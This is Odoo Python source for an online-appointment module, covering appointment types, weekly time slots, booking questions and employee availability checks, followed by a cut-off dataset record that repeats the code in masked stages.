reminder_ids = fields.Many2many('calendar.alarm', string="Reminders")
location = fields.Char('Location', help="Location of the appointments")
message_confirmation = fields.Html('Confirmation Message', translate=True)
message_intro = fields.Html('Introduction Message', translate=True)
country_ids = fields.Many2many(
'res.country', 'website_calendar_type_country_rel', string='Restrict Countries',
help="Keep empty to allow visitors from any country, otherwise you only allow visitors from selected countries")
question_ids = fields.One2many('calendar.appointment.question', 'appointment_type_id', string='Questions', copy=True)
slot_ids = fields.One2many('calendar.appointment.slot', 'appointment_type_id', 'Availabilities', copy=True)
appointment_tz = fields.Selection(
_tz_get, string='Timezone', required=True, default=lambda self: self.env.user.tz,
help="Timezone where appointment take place")
employee_ids = fields.Many2many('hr.employee', 'website_calendar_type_employee_rel', domain=[('user_id', '!=', False)], string='Employees')
assignation_method = fields.Selection([
('random', 'Random'),
('chosen', 'Chosen by the Customer')], string='Assignment Method', default='random',
help="How employees will be assigned to meetings customers book on your website.")
appointment_count = fields.Integer('# Appointments', compute='_compute_appointment_count')
def _compute_appointment_count(self):
meeting_data = self.env['calendar.event'].read_group([('appointment_type_id', 'in', self.ids)], ['appointment_type_id'], ['appointment_type_id'])
mapped_data = {m['appointment_type_id'][0]: m['appointment_type_id_count'] for m in meeting_data}
for appointment_type in self:
appointment_type.appointment_count = mapped_data.get(appointment_type.id, 0)
def _compute_website_url(self):
super(CalendarAppointmentType, self)._compute_website_url()
for appointment_type in self:
if appointment_type.id :
appointment_type.website_url = '/calendar/%s/appointment' % (slug(appointment_type),)
@api.returns('self', lambda value: value.id)
def copy(self, default=None):
default = default or {}
default['name'] = self.name + _(' (copy)')
return super(CalendarAppointmentType, self).copy(default=default)
def action_calendar_meetings(self):
self.ensure_one()
action = self.env["ir.actions.actions"]._for_xml_id("calendar.action_calendar_event")
action['context'] = {
'default_appointment_type_id': self.id,
'search_default_appointment_type_id': self.id
}
return action
# --------------------------------------
# Slots Generation
# --------------------------------------
def _slots_generate(self, first_day, last_day, timezone):
""" Generate all appointment slots (in naive UTC, appointment timezone, and given (visitors) timezone)
between first_day and last_day (datetimes in appointment timezone)
:return: [ {'slot': slot_record, <timezone>: (date_start, date_end), ...},
... ]
"""
def append_slot(day, slot):
local_start = appt_tz.localize(datetime.combine(day, time(hour=int(slot.hour), minute=int(round((slot.hour % 1) * 60)))))
local_end = appt_tz.localize(
datetime.combine(day, time(hour=int(slot.hour), minute=int(round((slot.hour % 1) * 60)))) + relativedelta(hours=self.appointment_duration))
slots.append({
self.appointment_tz: (
local_start,
local_end,
),
timezone: (
local_start.astimezone(requested_tz),
local_end.astimezone(requested_tz),
),
'UTC': (
local_start.astimezone(pytz.UTC).replace(tzinfo=None),
local_end.astimezone(pytz.UTC).replace(tzinfo=None),
),
'slot': slot,
})
appt_tz = pytz.timezone(self.appointment_tz)
requested_tz = pytz.timezone(timezone)
slots = []
for slot in self.slot_ids.filtered(lambda x: int(x.weekday) == first_day.isoweekday()):
if slot.hour > first_day.hour + first_day.minute / 60.0:
append_slot(first_day.date(), slot)
slot_weekday = [int(weekday) - 1 for weekday in self.slot_ids.mapped('weekday')]
for day in rrule.rrule(rrule.DAILY,
dtstart=first_day.date() + timedelta(days=1),
until=last_day.date(),
byweekday=slot_weekday):
for slot in self.slot_ids.filtered(lambda x: int(x.weekday) == day.isoweekday()):
append_slot(day, slot)
return slots
def _slots_available(self, slots, first_day, last_day, employee=None):
""" Fills the slot stucture with an available employee
:param slots: slots structure generated by _slots_generate
:param first_day: start datetime in UTC
:param last_day: end datetime in UTC
:param employee: if set, only consider this employee
if not set, consider all employees assigned to this appointment type
"""
def is_work_available(start_dt, end_dt, intervals):
""" check if the slot is contained in the employee's work hours (defined by intervals)
"""
def find_start_index():
""" find the highest index of intervals for which the start_date (element [0]) is before (or at) start_dt
"""
def recursive_find_index(lower_bound, upper_bound):
if upper_bound - lower_bound <= 1:
if intervals[upper_bound][0] <= start_dt:
return upper_bound
return lower_bound
index = (upper_bound + lower_bound) // 2
if intervals[index][0] <= start_dt:
return recursive_find_index(index, upper_bound)
else:
return recursive_find_index(lower_bound, index)
if start_dt <= intervals[0][0] - tolerance:
return -1
if end_dt >= intervals[-1][1] + tolerance:
return -1
return recursive_find_index(0, len(intervals) - 1)
if not intervals:
return False
tolerance = timedelta(minutes=1)
start_index = find_start_index()
if start_index != -1:
for index in range(start_index, len(intervals)):
if intervals[index][1] >= end_dt - tolerance:
return True
if len(intervals) == index + 1 or intervals[index + 1][0] - intervals[index][1] > tolerance:
return False
return False
def is_calendar_available(slot, events, employee):
""" Returns True if the given slot doesn't collide with given events for the employee
"""
start_dt = slot['UTC'][0]
end_dt = slot['UTC'][1]
event_in_scope = lambda ev: (
fields.Date.to_date(ev.start) <= fields.Date.to_date(end_dt)
and fields.Date.to_date(ev.stop) >= fields.Date.to_date(start_dt)
)
for ev in events.filtered(event_in_scope):
if ev.allday:
# allday events are considered to take the whole day in the related employee's timezone
event_tz = pytz.timezone(ev.event_tz or employee.user_id.tz or self.env.user.tz or slot['slot'].appointment_type_id.appointment_tz or 'UTC')
ev_start_dt = datetime.combine(fields.Date.from_string(ev.start_date), time.min)
ev_stop_dt = datetime.combine(fields.Date.from_string(ev.stop_date), time.max)
ev_start_dt = event_tz.localize(ev_start_dt).astimezone(pytz.UTC).replace(tzinfo=None)
ev_stop_dt = event_tz.localize(ev_stop_dt).astimezone(pytz.UTC).replace(tzinfo=None)
if ev_start_dt < end_dt and ev_stop_dt > start_dt:
return False
elif fields.Datetime.to_datetime(ev.start) < end_dt and fields.Datetime.to_datetime(ev.stop) > start_dt:
return False
return True
workhours = {}
meetings = {}
# With context will be used in resource.calendar to force the referential user
# for work interval computing to the *user linked to the employee*
available_employees = [emp.with_context(tz=emp.user_id.tz) for emp in (employee or self.employee_ids)]
random.shuffle(available_employees)
for slot in slots:
for emp_pos, emp in enumerate(available_employees):
if emp_pos not in workhours:
workhours[emp_pos] = [
(interval[0].astimezone(pytz.UTC).replace(tzinfo=None),
interval[1].astimezone(pytz.UTC).replace(tzinfo=None))
for interval in emp.resource_calendar_id._work_intervals_batch(
first_day, last_day, resources=emp.resource_id,
)[emp.resource_id.id]
]
if is_work_available(slot['UTC'][0], slot['UTC'][1], workhours[emp_pos]):
if emp_pos not in meetings:
# note: no check is made on the attendee's status (accepted/declined/...)
meetings[emp_pos] = self.env['calendar.event'].search([
('partner_ids.user_ids', '=', emp.user_id.id),
('start', '<', fields.Datetime.to_string(last_day.replace(hour=23, minute=59, second=59))),
('stop', '>', fields.Datetime.to_string(first_day.replace(hour=0, minute=0, second=0)))
])
if is_calendar_available(slot, meetings[emp_pos], emp):
slot['employee_id'] = emp
break
def _get_appointment_slots(self, timezone, employee=None):
""" Fetch available slots to book an appointment
:param timezone: timezone string e.g.: 'Europe/Brussels' or 'Etc/GMT+1'
:param employee: if set will only check available slots for this employee
:returns: list of dicts (1 per month) containing available slots per day per week.
complex structure used to simplify rendering of template
"""
self.ensure_one()
appt_tz = pytz.timezone(self.appointment_tz)
requested_tz = pytz.timezone(timezone)
first_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(hours=self.min_schedule_hours))
last_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(days=self.max_schedule_days))
# Compute available slots (ordered)
slots = self._slots_generate(first_day.astimezone(appt_tz), last_day.astimezone(appt_tz), timezone)
if not employee or employee in self.employee_ids:
self._slots_available(slots, first_day.astimezone(pytz.UTC), last_day.astimezone(pytz.UTC), employee)
# Compute calendar rendering and inject available slots
today = requested_tz.fromutc(datetime.utcnow())
start = today
month_dates_calendar = cal.Calendar(0).monthdatescalendar
months = []
while (start.year, start.month) <= (last_day.year, last_day.month):
dates = month_dates_calendar(start.year, start.month)
for week_index, week in enumerate(dates):
for day_index, day in enumerate(week):
mute_cls = weekend_cls = today_cls = None
today_slots = []
if day.weekday() in (cal.SUNDAY, cal.SATURDAY):
weekend_cls = 'o_weekend'
if day == today.date() and day.month == today.month:
today_cls = 'o_today'
if day.month != start.month:
mute_cls = 'text-muted o_mute_day'
else:
# slots are ordered, so check all unprocessed slots from until > day
while slots and (slots[0][timezone][0].date() <= day):
if (slots[0][timezone][0].date() == day) and ('employee_id' in slots[0]):
today_slots.append({
'employee_id': slots[0]['employee_id'].id,
'datetime': slots[0][timezone][0].strftime('%Y-%m-%d %H:%M:%S'),
'hours': slots[0][timezone][0].strftime('%H:%M')
})
slots.pop(0)
dates[week_index][day_index] = {
'day': day,
'slots': today_slots,
'mute_cls': mute_cls,
'weekend_cls': weekend_cls,
'today_cls': today_cls
}
months.append({
'month': format_datetime(start, 'MMMM Y', locale=get_lang(self.env).code),
'weeks': dates
})
start = start + relativedelta(months=1)
return months
class CalendarAppointmentSlot(models.Model):
_name = "calendar.appointment.slot"
_description = "Online Appointment : Time Slot"
_rec_name = "weekday"
_order = "weekday, hour"
appointment_type_id = fields.Many2one('calendar.appointment.type', 'Appointment Type', ondelete='cascade')
weekday = fields.Selection([
('1', 'Monday'),
('2', 'Tuesday'),
('3', 'Wednesday'),
('4', 'Thursday'),
('5', 'Friday'),
('6', 'Saturday'),
('7', 'Sunday'),
], string='Week Day', required=True)
hour = fields.Float('Starting Hour', required=True, default=8.0)
@api.constrains('hour')
def check_hour(self):
if any(slot.hour < 0.00 or slot.hour >= 24.00 for slot in self):
raise ValidationError(_("Please enter a valid hour between 0:00 and 24:00 for your slots."))
def name_get(self):
weekdays = dict(self._fields['weekday'].selection)
return self.mapped(lambda slot: (slot.id, "%s, %02d:%02d" % (weekdays.get(slot.weekday), int(slot.hour), int(round((slot.hour % 1) * 60)))))
class CalendarAppointmentQuestion(models.Model):
_name = "calendar.appointment.question"
_description = "Online Appointment : Questions"
_order = "sequence"
sequence = fields.Integer('Sequence')
appointment_type_id = fields.Many2one('calendar.appointment.type', 'Appointment Type', ondelete="cascade")
name = fields.Char('Question', translate=True, required=True)
placeholder = fields.Char('Placeholder', translate=True)
question_required = fields.Boolean('Required Answer')
question_type = fields.Selection([
('char', 'Single line text'),
('text', 'Multi-line text'),
('select', 'Dropdown (one answer)'),
('radio', 'Radio (one answer)'),
('checkbox', 'Checkboxes (multiple answers)')], 'Question Type', default='char')
answer_ids = fields.Many2many('calendar.appointment.answer', 'calendar_appointment_question_answer_rel', 'question_id', 'answer_id', string='Available Answers')
class CalendarAppointmentAnswer(models.Model):
_name = "calendar.appointment.answer"
_description = "Online Appointment : Answers"
question_id = fields.Many2many('calendar.appointment.question', 'calendar_appointment_question_answer_rel', 'answer_id', 'question_id', string='Questions')
name = fields.Char('Answer', translate=True, required=True)
|
flexible
|
{
"blob_id": "e03dfa0e02313c5478d4e97dcaf3bc27915bd878",
"index": 1421,
"step-1": "<mask token>\n\n\nclass CalendarAppointmentSlot(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @api.constrains('hour')\n def check_hour(self):\n if any(slot.hour < 0.0 or slot.hour >= 24.0 for slot in self):\n raise ValidationError(_(\n 'Please enter a valid hour between 0:00 and 24:00 for your slots.'\n ))\n\n def name_get(self):\n weekdays = dict(self._fields['weekday'].selection)\n return self.mapped(lambda slot: (slot.id, '%s, %02d:%02d' % (\n weekdays.get(slot.weekday), int(slot.hour), int(round(slot.hour %\n 1 * 60)))))\n\n\nclass CalendarAppointmentQuestion(models.Model):\n _name = 'calendar.appointment.question'\n _description = 'Online Appointment : Questions'\n _order = 'sequence'\n sequence = fields.Integer('Sequence')\n appointment_type_id = fields.Many2one('calendar.appointment.type',\n 'Appointment Type', ondelete='cascade')\n name = fields.Char('Question', translate=True, required=True)\n placeholder = fields.Char('Placeholder', translate=True)\n question_required = fields.Boolean('Required Answer')\n question_type = fields.Selection([('char', 'Single line text'), ('text',\n 'Multi-line text'), ('select', 'Dropdown (one answer)'), ('radio',\n 'Radio (one answer)'), ('checkbox', 'Checkboxes (multiple answers)'\n )], 'Question Type', default='char')\n answer_ids = fields.Many2many('calendar.appointment.answer',\n 'calendar_appointment_question_answer_rel', 'question_id',\n 'answer_id', string='Available Answers')\n\n\nclass CalendarAppointmentAnswer(models.Model):\n _name = 'calendar.appointment.answer'\n _description = 'Online Appointment : Answers'\n question_id = fields.Many2many('calendar.appointment.question',\n 'calendar_appointment_question_answer_rel', 'answer_id',\n 'question_id', string='Questions')\n name = fields.Char('Answer', translate=True, required=True)\n",
"step-2": "<mask token>\n\n\nclass CalendarAppointmentType(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def _get_appointment_slots(self, timezone, employee=None):\n \"\"\" Fetch available slots to book an appointment\n :param timezone: timezone string e.g.: 'Europe/Brussels' or 'Etc/GMT+1'\n :param employee: if set will only check available slots for this employee\n :returns: list of dicts (1 per month) containing available slots per day per week.\n complex structure used to simplify rendering of template\n \"\"\"\n self.ensure_one()\n appt_tz = pytz.timezone(self.appointment_tz)\n requested_tz = pytz.timezone(timezone)\n first_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(\n hours=self.min_schedule_hours))\n last_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(\n days=self.max_schedule_days))\n slots = self._slots_generate(first_day.astimezone(appt_tz),\n last_day.astimezone(appt_tz), timezone)\n if not employee or employee in self.employee_ids:\n self._slots_available(slots, first_day.astimezone(pytz.UTC),\n last_day.astimezone(pytz.UTC), employee)\n today = requested_tz.fromutc(datetime.utcnow())\n start = today\n month_dates_calendar = cal.Calendar(0).monthdatescalendar\n months = []\n while (start.year, start.month) <= (last_day.year, last_day.month):\n dates = month_dates_calendar(start.year, start.month)\n for week_index, week in enumerate(dates):\n for day_index, day in enumerate(week):\n mute_cls = weekend_cls = today_cls = None\n today_slots = []\n if day.weekday() in (cal.SUNDAY, cal.SATURDAY):\n weekend_cls = 'o_weekend'\n if day == today.date() and day.month == today.month:\n today_cls = 'o_today'\n if day.month != start.month:\n mute_cls = 'text-muted o_mute_day'\n else:\n while slots and slots[0][timezone][0].date() <= day:\n if slots[0][timezone][0].date(\n ) == day and 'employee_id' in slots[0]:\n today_slots.append({'employee_id': slots[0]\n ['employee_id'].id, 'datetime': slots[0\n ][timezone][0].strftime(\n '%Y-%m-%d %H:%M:%S'), 'hours': slots[0]\n [timezone][0].strftime('%H:%M')})\n slots.pop(0)\n dates[week_index][day_index] = {'day': day, 'slots':\n today_slots, 'mute_cls': mute_cls, 'weekend_cls':\n weekend_cls, 'today_cls': today_cls}\n months.append({'month': format_datetime(start, 'MMMM Y', locale\n =get_lang(self.env).code), 'weeks': dates})\n start = start + relativedelta(months=1)\n return months\n\n\nclass CalendarAppointmentSlot(models.Model):\n _name = 'calendar.appointment.slot'\n _description = 'Online Appointment : Time Slot'\n _rec_name = 'weekday'\n _order = 'weekday, hour'\n appointment_type_id = fields.Many2one('calendar.appointment.type',\n 'Appointment Type', ondelete='cascade')\n weekday = fields.Selection([('1', 'Monday'), ('2', 'Tuesday'), ('3',\n 'Wednesday'), ('4', 'Thursday'), ('5', 'Friday'), ('6', 'Saturday'),\n ('7', 'Sunday')], string='Week Day', required=True)\n hour = fields.Float('Starting Hour', required=True, default=8.0)\n\n @api.constrains('hour')\n def check_hour(self):\n if any(slot.hour < 0.0 or slot.hour >= 24.0 for slot in self):\n raise ValidationError(_(\n 'Please enter a valid hour between 0:00 and 24:00 for your slots.'\n ))\n\n def name_get(self):\n weekdays = dict(self._fields['weekday'].selection)\n return self.mapped(lambda slot: (slot.id, '%s, %02d:%02d' % (\n weekdays.get(slot.weekday), int(slot.hour), int(round(slot.hour %\n 1 * 60)))))\n\n\nclass CalendarAppointmentQuestion(models.Model):\n _name = 'calendar.appointment.question'\n _description = 'Online Appointment : Questions'\n _order = 'sequence'\n sequence = fields.Integer('Sequence')\n appointment_type_id = fields.Many2one('calendar.appointment.type',\n 'Appointment Type', ondelete='cascade')\n name = fields.Char('Question', translate=True, required=True)\n placeholder = fields.Char('Placeholder', translate=True)\n question_required = fields.Boolean('Required Answer')\n question_type = fields.Selection([('char', 'Single line text'), ('text',\n 'Multi-line text'), ('select', 'Dropdown (one answer)'), ('radio',\n 'Radio (one answer)'), ('checkbox', 'Checkboxes (multiple answers)'\n )], 'Question Type', default='char')\n answer_ids = fields.Many2many('calendar.appointment.answer',\n 'calendar_appointment_question_answer_rel', 'question_id',\n 'answer_id', string='Available Answers')\n\n\nclass CalendarAppointmentAnswer(models.Model):\n _name = 'calendar.appointment.answer'\n _description = 'Online Appointment : Answers'\n question_id = fields.Many2many('calendar.appointment.question',\n 'calendar_appointment_question_answer_rel', 'answer_id',\n 'question_id', string='Questions')\n name = fields.Char('Answer', translate=True, required=True)\n",
"step-3": "<mask token>\n\n\nclass CalendarAppointmentType(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def _compute_website_url(self):\n super(CalendarAppointmentType, self)._compute_website_url()\n for appointment_type in self:\n if appointment_type.id:\n appointment_type.website_url = '/calendar/%s/appointment' % (\n slug(appointment_type),)\n <mask token>\n\n def action_calendar_meetings(self):\n self.ensure_one()\n action = self.env['ir.actions.actions']._for_xml_id(\n 'calendar.action_calendar_event')\n action['context'] = {'default_appointment_type_id': self.id,\n 'search_default_appointment_type_id': self.id}\n return action\n <mask token>\n <mask token>\n\n def _get_appointment_slots(self, timezone, employee=None):\n \"\"\" Fetch available slots to book an appointment\n :param timezone: timezone string e.g.: 'Europe/Brussels' or 'Etc/GMT+1'\n :param employee: if set will only check available slots for this employee\n :returns: list of dicts (1 per month) containing available slots per day per week.\n complex structure used to simplify rendering of template\n \"\"\"\n self.ensure_one()\n appt_tz = pytz.timezone(self.appointment_tz)\n requested_tz = pytz.timezone(timezone)\n first_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(\n hours=self.min_schedule_hours))\n last_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(\n days=self.max_schedule_days))\n slots = self._slots_generate(first_day.astimezone(appt_tz),\n last_day.astimezone(appt_tz), timezone)\n if not employee or employee in self.employee_ids:\n self._slots_available(slots, first_day.astimezone(pytz.UTC),\n last_day.astimezone(pytz.UTC), employee)\n today = requested_tz.fromutc(datetime.utcnow())\n start = today\n month_dates_calendar = cal.Calendar(0).monthdatescalendar\n months = []\n while (start.year, start.month) <= (last_day.year, last_day.month):\n dates = month_dates_calendar(start.year, start.month)\n for week_index, week in enumerate(dates):\n for day_index, day in enumerate(week):\n mute_cls = weekend_cls = today_cls = None\n today_slots = []\n if day.weekday() in (cal.SUNDAY, cal.SATURDAY):\n weekend_cls = 'o_weekend'\n if day == today.date() and day.month == today.month:\n today_cls = 'o_today'\n if day.month != start.month:\n mute_cls = 'text-muted o_mute_day'\n else:\n while slots and slots[0][timezone][0].date() <= day:\n if slots[0][timezone][0].date(\n ) == day and 'employee_id' in slots[0]:\n today_slots.append({'employee_id': slots[0]\n ['employee_id'].id, 'datetime': slots[0\n ][timezone][0].strftime(\n '%Y-%m-%d %H:%M:%S'), 'hours': slots[0]\n [timezone][0].strftime('%H:%M')})\n slots.pop(0)\n dates[week_index][day_index] = {'day': day, 'slots':\n today_slots, 'mute_cls': mute_cls, 'weekend_cls':\n weekend_cls, 'today_cls': today_cls}\n months.append({'month': format_datetime(start, 'MMMM Y', locale\n =get_lang(self.env).code), 'weeks': dates})\n start = start + relativedelta(months=1)\n return months\n\n\nclass CalendarAppointmentSlot(models.Model):\n _name = 'calendar.appointment.slot'\n _description = 'Online Appointment : Time Slot'\n _rec_name = 'weekday'\n _order = 'weekday, hour'\n appointment_type_id = fields.Many2one('calendar.appointment.type',\n 'Appointment Type', ondelete='cascade')\n weekday = fields.Selection([('1', 'Monday'), ('2', 'Tuesday'), ('3',\n 'Wednesday'), ('4', 'Thursday'), ('5', 'Friday'), ('6', 'Saturday'),\n ('7', 'Sunday')], string='Week Day', required=True)\n hour = fields.Float('Starting Hour', required=True, default=8.0)\n\n @api.constrains('hour')\n def check_hour(self):\n if any(slot.hour < 0.0 or slot.hour >= 24.0 for slot in self):\n raise ValidationError(_(\n 'Please enter a valid hour between 0:00 and 24:00 for your slots.'\n ))\n\n def name_get(self):\n weekdays = dict(self._fields['weekday'].selection)\n return self.mapped(lambda slot: (slot.id, '%s, %02d:%02d' % (\n weekdays.get(slot.weekday), int(slot.hour), int(round(slot.hour %\n 1 * 60)))))\n\n\nclass CalendarAppointmentQuestion(models.Model):\n _name = 'calendar.appointment.question'\n _description = 'Online Appointment : Questions'\n _order = 'sequence'\n sequence = fields.Integer('Sequence')\n appointment_type_id = fields.Many2one('calendar.appointment.type',\n 'Appointment Type', ondelete='cascade')\n name = fields.Char('Question', translate=True, required=True)\n placeholder = fields.Char('Placeholder', translate=True)\n question_required = fields.Boolean('Required Answer')\n question_type = fields.Selection([('char', 'Single line text'), ('text',\n 'Multi-line text'), ('select', 'Dropdown (one answer)'), ('radio',\n 'Radio (one answer)'), ('checkbox', 'Checkboxes (multiple answers)'\n )], 'Question Type', default='char')\n answer_ids = fields.Many2many('calendar.appointment.answer',\n 'calendar_appointment_question_answer_rel', 'question_id',\n 'answer_id', string='Available Answers')\n\n\nclass CalendarAppointmentAnswer(models.Model):\n _name = 'calendar.appointment.answer'\n _description = 'Online Appointment : Answers'\n question_id = fields.Many2many('calendar.appointment.question',\n 'calendar_appointment_question_answer_rel', 'answer_id',\n 'question_id', string='Questions')\n name = fields.Char('Answer', translate=True, required=True)\n",
"step-4": "import calendar as cal\nimport random\nimport pytz\nfrom datetime import datetime, timedelta, time\nfrom dateutil import rrule\nfrom dateutil.relativedelta import relativedelta\nfrom babel.dates import format_datetime\nfrom odoo import api, fields, models, _\nfrom odoo.tools.misc import get_lang\nfrom odoo.addons.base.models.res_partner import _tz_get\nfrom odoo.addons.http_routing.models.ir_http import slug\nfrom odoo.exceptions import ValidationError\n\n\nclass CalendarAppointmentType(models.Model):\n _name = 'calendar.appointment.type'\n _description = 'Online Appointment Type'\n _inherit = ['mail.thread', 'website.seo.metadata',\n 'website.published.mixin']\n _order = 'sequence'\n sequence = fields.Integer('Sequence')\n name = fields.Char('Appointment Type', required=True, translate=True)\n min_schedule_hours = fields.Float('Schedule before (hours)', required=\n True, default=1.0)\n max_schedule_days = fields.Integer('Schedule not after (days)',\n required=True, default=15)\n min_cancellation_hours = fields.Float('Cancel Before (hours)', required\n =True, default=1.0)\n appointment_duration = fields.Float('Appointment Duration', required=\n True, default=1.0)\n reminder_ids = fields.Many2many('calendar.alarm', string='Reminders')\n location = fields.Char('Location', help='Location of the appointments')\n message_confirmation = fields.Html('Confirmation Message', translate=True)\n message_intro = fields.Html('Introduction Message', translate=True)\n country_ids = fields.Many2many('res.country',\n 'website_calendar_type_country_rel', string='Restrict Countries',\n help=\n 'Keep empty to allow visitors from any country, otherwise you only allow visitors from selected countries'\n )\n question_ids = fields.One2many('calendar.appointment.question',\n 'appointment_type_id', string='Questions', copy=True)\n slot_ids = fields.One2many('calendar.appointment.slot',\n 'appointment_type_id', 'Availabilities', copy=True)\n appointment_tz = fields.Selection(_tz_get, string='Timezone', required=\n True, default=lambda self: self.env.user.tz, help=\n 'Timezone where appointment take place')\n employee_ids = fields.Many2many('hr.employee',\n 'website_calendar_type_employee_rel', domain=[('user_id', '!=', \n False)], string='Employees')\n assignation_method = fields.Selection([('random', 'Random'), ('chosen',\n 'Chosen by the Customer')], string='Assignment Method', default=\n 'random', help=\n 'How employees will be assigned to meetings customers book on your website.'\n )\n appointment_count = fields.Integer('# Appointments', compute=\n '_compute_appointment_count')\n\n def _compute_appointment_count(self):\n meeting_data = self.env['calendar.event'].read_group([(\n 'appointment_type_id', 'in', self.ids)], ['appointment_type_id'\n ], ['appointment_type_id'])\n mapped_data = {m['appointment_type_id'][0]: m[\n 'appointment_type_id_count'] for m in meeting_data}\n for appointment_type in self:\n appointment_type.appointment_count = mapped_data.get(\n appointment_type.id, 0)\n\n def _compute_website_url(self):\n super(CalendarAppointmentType, self)._compute_website_url()\n for appointment_type in self:\n if appointment_type.id:\n appointment_type.website_url = '/calendar/%s/appointment' % (\n slug(appointment_type),)\n\n @api.returns('self', lambda value: value.id)\n def copy(self, default=None):\n default = default or {}\n default['name'] = self.name + _(' (copy)')\n return super(CalendarAppointmentType, self).copy(default=default)\n\n def action_calendar_meetings(self):\n self.ensure_one()\n action = self.env['ir.actions.actions']._for_xml_id(\n 'calendar.action_calendar_event')\n action['context'] = {'default_appointment_type_id': self.id,\n 'search_default_appointment_type_id': self.id}\n return action\n\n def _slots_generate(self, first_day, last_day, timezone):\n \"\"\" Generate all appointment slots (in naive UTC, appointment timezone, and given (visitors) timezone)\n between first_day and last_day (datetimes in appointment timezone)\n\n :return: [ {'slot': slot_record, <timezone>: (date_start, date_end), ...},\n ... ]\n \"\"\"\n\n def append_slot(day, slot):\n local_start = appt_tz.localize(datetime.combine(day, time(hour=\n int(slot.hour), minute=int(round(slot.hour % 1 * 60)))))\n local_end = appt_tz.localize(datetime.combine(day, time(hour=\n int(slot.hour), minute=int(round(slot.hour % 1 * 60)))) +\n relativedelta(hours=self.appointment_duration))\n slots.append({self.appointment_tz: (local_start, local_end),\n timezone: (local_start.astimezone(requested_tz), local_end.\n astimezone(requested_tz)), 'UTC': (local_start.astimezone(\n pytz.UTC).replace(tzinfo=None), local_end.astimezone(pytz.\n UTC).replace(tzinfo=None)), 'slot': slot})\n appt_tz = pytz.timezone(self.appointment_tz)\n requested_tz = pytz.timezone(timezone)\n slots = []\n for slot in self.slot_ids.filtered(lambda x: int(x.weekday) ==\n first_day.isoweekday()):\n if slot.hour > first_day.hour + first_day.minute / 60.0:\n append_slot(first_day.date(), slot)\n slot_weekday = [(int(weekday) - 1) for weekday in self.slot_ids.\n mapped('weekday')]\n for day in rrule.rrule(rrule.DAILY, dtstart=first_day.date() +\n timedelta(days=1), until=last_day.date(), byweekday=slot_weekday):\n for slot in self.slot_ids.filtered(lambda x: int(x.weekday) ==\n day.isoweekday()):\n append_slot(day, slot)\n return slots\n\n def _slots_available(self, slots, first_day, last_day, employee=None):\n \"\"\" Fills the slot stucture with an available employee\n\n :param slots: slots structure generated by _slots_generate\n :param first_day: start datetime in UTC\n :param last_day: end datetime in UTC\n :param employee: if set, only consider this employee\n if not set, consider all employees assigned to this appointment type\n \"\"\"\n\n def is_work_available(start_dt, end_dt, intervals):\n \"\"\" check if the slot is contained in the employee's work hours (defined by intervals)\n \"\"\"\n\n def find_start_index():\n \"\"\" find the highest index of intervals for which the start_date (element [0]) is before (or at) start_dt\n \"\"\"\n\n def recursive_find_index(lower_bound, upper_bound):\n if upper_bound - lower_bound <= 1:\n if intervals[upper_bound][0] <= start_dt:\n return upper_bound\n return lower_bound\n index = (upper_bound + lower_bound) // 2\n if intervals[index][0] <= start_dt:\n return recursive_find_index(index, upper_bound)\n else:\n return recursive_find_index(lower_bound, index)\n if start_dt <= intervals[0][0] - tolerance:\n return -1\n if end_dt >= intervals[-1][1] + tolerance:\n return -1\n return recursive_find_index(0, len(intervals) - 1)\n if not intervals:\n return False\n tolerance = timedelta(minutes=1)\n start_index = find_start_index()\n if start_index != -1:\n for index in range(start_index, len(intervals)):\n if intervals[index][1] >= end_dt - tolerance:\n return True\n if len(intervals) == index + 1 or intervals[index + 1][0\n ] - intervals[index][1] > tolerance:\n return False\n return False\n\n def is_calendar_available(slot, events, employee):\n \"\"\" Returns True if the given slot doesn't collide with given events for the employee\n \"\"\"\n start_dt = slot['UTC'][0]\n end_dt = slot['UTC'][1]\n event_in_scope = lambda ev: fields.Date.to_date(ev.start\n ) <= fields.Date.to_date(end_dt) and fields.Date.to_date(ev\n .stop) >= fields.Date.to_date(start_dt)\n for ev in events.filtered(event_in_scope):\n if ev.allday:\n event_tz = pytz.timezone(ev.event_tz or employee.\n user_id.tz or self.env.user.tz or slot['slot'].\n appointment_type_id.appointment_tz or 'UTC')\n ev_start_dt = datetime.combine(fields.Date.from_string(\n ev.start_date), time.min)\n ev_stop_dt = datetime.combine(fields.Date.from_string(\n ev.stop_date), time.max)\n ev_start_dt = event_tz.localize(ev_start_dt).astimezone(\n pytz.UTC).replace(tzinfo=None)\n ev_stop_dt = event_tz.localize(ev_stop_dt).astimezone(pytz\n .UTC).replace(tzinfo=None)\n if ev_start_dt < end_dt and ev_stop_dt > start_dt:\n return False\n elif fields.Datetime.to_datetime(ev.start\n ) < end_dt and fields.Datetime.to_datetime(ev.stop\n ) > start_dt:\n return False\n return True\n workhours = {}\n meetings = {}\n available_employees = [emp.with_context(tz=emp.user_id.tz) for emp in\n employee or self.employee_ids]\n random.shuffle(available_employees)\n for slot in slots:\n for emp_pos, emp in enumerate(available_employees):\n if emp_pos not in workhours:\n workhours[emp_pos] = [(interval[0].astimezone(pytz.UTC)\n .replace(tzinfo=None), interval[1].astimezone(pytz.\n UTC).replace(tzinfo=None)) for interval in emp.\n resource_calendar_id._work_intervals_batch(\n first_day, last_day, resources=emp.resource_id)[emp\n .resource_id.id]]\n if is_work_available(slot['UTC'][0], slot['UTC'][1],\n workhours[emp_pos]):\n if emp_pos not in meetings:\n meetings[emp_pos] = self.env['calendar.event'].search([\n ('partner_ids.user_ids', '=', emp.user_id.id),\n ('start', '<', fields.Datetime.to_string(\n 